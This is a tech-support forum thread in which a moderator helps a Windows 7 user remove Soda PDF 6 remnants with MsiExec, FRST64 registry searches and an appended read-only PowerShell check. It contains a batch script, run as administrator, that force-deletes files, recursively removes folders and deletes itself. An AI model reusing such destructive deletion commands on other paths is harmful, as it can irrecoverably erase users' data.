MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

Follow the prompts to uninstall Soda PDF 6.

------------------------------------------------------

If Soda PDF 6 uninstalled successfully...

Open Notepad and copy/paste the entire contents of the codebox below into Notepad:

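Code:
@echo off
rem Clear any log left over from a previous run.
if exist "%temp%\log.txt" del "%temp%\log.txt"

rem Delete the flagged installer; log it if it is still present afterwards.
for %%g in (

"C:\Users\Mom\Downloads\uTorrent.exe"

) do (
del /a/f/q %%g >nul 2>&1
if exist %%g echo.%%~g>>"%temp%\log.txt"
)

rem Remove the leftover Soda PDF 6 folders; log any that could not be removed.
for %%g in (

"C:\ProgramData\Soda PDF 6"
"C:\Users\All Users\Soda PDF 6"
"C:\Program Files (x86)\Soda PDF 6"

) do (
rd /s/q %%g >nul 2>&1
if exist %%g echo.%%~g>>"%temp%\log.txt"
)

rem Open the list of items that could not be deleted, or report success.
if exist "%temp%\log.txt" ( start notepad "%temp%\log.txt"
) else echo.Deleted Successfully !!

pause
rem The script deletes itself once it has finished.
del %0

Save this Notepad file as fix.bat and choose to Save as type: - All Files to your desktop then close the Notepad file.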
It should look like this:

Right-click on fix.bat and choose 'Run as administrator' to allow it to run.

Tell me what it says in your next reply. Press any key to continue.

------------------------------------------------------

As far as the Windows 10 update, don't install that until we are done here.

Download the Office update from here:

Download Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition from Official Microsoft Download Center

Save it to your desktop, run it, and follow the prompts. Let me know if it installed successfully.

------------------------------------------------------
chemist is offline  
Old 08-15-2015, 12:28 AM   #19
Registered Member
 
Join Date: Aug 2015
Posts: 27
OS: Windows 7 SP1



Hi chemist
Windows Installer -
The copy and paste of the commands se Delete LULU, se Delete Soda PDF 6 and MsiExec.exe /I{96CB8DA8-CD23-4406-97FD-33A41AF2CD70} do not remain in bold type when pasted to the Windows installer box.
With the 'de Delete...' prompts a screen flashes on/off but so fast I cannot see what it is (maybe this is correct?);
the MsiExec... brings up a warning ' X This action is only valid for products that are currently installed '

Thanks.
kkollage is offline  
Old 08-15-2015, 07:25 AM   #20
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, kkollage. You're welcome. I don't know what "se" and "de" mean.

Those commands aren't supposed to stay bolded when copied/pasted.

It's just to make clear to users what is supposed to be copied/pasted.

And, yes, that DOS screen will flash quickly; that is normal.

Sounds like Soda PDF 6 has already been uninstalled.

------------------------------------------------------

Run FRST64 again. Copy/paste the following bolded text into the Search window and click 'Search Registry':

{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}

Once done, a log will pop open. Please copy/paste the contents of the log here in your next reply.

The log, Search.txt, will also be saved at the same location that FRST64.exe is located.

------------------------------------------------------

Did you try manually installing that update?

------------------------------------------------------
chemist is offline  
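
The check behind post #20 (MsiExec says the product is not installed, so look in the registry for its product code) can also be done with a read-only script. The PowerShell below is an added example, not part of the original thread: the product code, service names and folder paths are the ones quoted above, while the function names and the list of registry locations are assumptions of this example. It goes slightly beyond the thread by also checking the packed form in which Windows Installer stores product codes, which a search for the braced GUID does not match.

```powershell
# Added example (not from the thread): read-only check for what is left of an
# MSI product after uninstalling it. Nothing is modified or deleted.
# Runs on the PowerShell 2.0 shipped with Windows 7 SP1; use a 64-bit,
# elevated console so both registry views are visible.

# Values quoted in the thread.
$ProductCode = '{96CB8DA8-CD23-4406-97FD-33A41AF2CD70}'
$Services    = @('LULU Software CrashHandler', 'Soda PDF 6')
$Folders     = @('C:\ProgramData\Soda PDF 6',
                 'C:\Program Files (x86)\Soda PDF 6')

# Windows Installer stores product codes in a "packed" form under
# Installer\Products: the first three groups are reversed character by
# character and the last 16 hex digits are swapped in pairs.
function ConvertTo-PackedGuid {
    param([string]$Guid)
    $hex = $Guid -replace '[{}-]', ''
    if ($hex -notmatch '^[0-9A-Fa-f]{32}$') { throw "Not a GUID: $Guid" }
    $packed = ''
    foreach ($span in @(@(0, 8), @(8, 4), @(12, 4))) {
        $chars = $hex.Substring($span[0], $span[1]).ToCharArray()
        [array]::Reverse($chars)
        $packed += (-join $chars)
    }
    for ($i = 16; $i -lt 32; $i += 2) {
        $packed += $hex.Substring($i + 1, 1) + $hex.Substring($i, 1)
    }
    $packed.ToUpper()
}

# Test-Path handles registry keys and folders alike.
function Test-Leftover {
    param([string]$Kind, [string]$Path)
    New-Object PSObject -Property @{
        Kind    = $Kind
        Path    = $Path
        Present = (Test-Path -LiteralPath $Path)
    }
}

$uninstall = 'Microsoft\Windows\CurrentVersion\Uninstall'
$results = @()
$results += Test-Leftover 'Uninstall key (64-bit)' "HKLM:\SOFTWARE\$uninstall\$ProductCode"
$results += Test-Leftover 'Uninstall key (32-bit)' "HKLM:\SOFTWARE\Wow6432Node\$uninstall\$ProductCode"
$results += Test-Leftover 'Installer product' `
    ("HKLM:\SOFTWARE\Classes\Installer\Products\" + (ConvertTo-PackedGuid $ProductCode))
foreach ($name in $Services) {
    $results += Test-Leftover 'Service key' "HKLM:\SYSTEM\CurrentControlSet\Services\$name"
}
foreach ($dir in $Folders) {
    $results += Test-Leftover 'Folder' $dir
}

# One row per location; True in the Present column means something remains.
$results | Format-Table Present, Kind, Path -AutoSize
if ($results | Where-Object { $_.Present }) {
    'Leftovers found: review the rows marked True.'
} else {
    'No product registration, service keys or folders remain.'
}
```

If every row shows False, the MsiExec message "This action is only valid for products that are currently installed" is consistent with the product already being gone.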
 
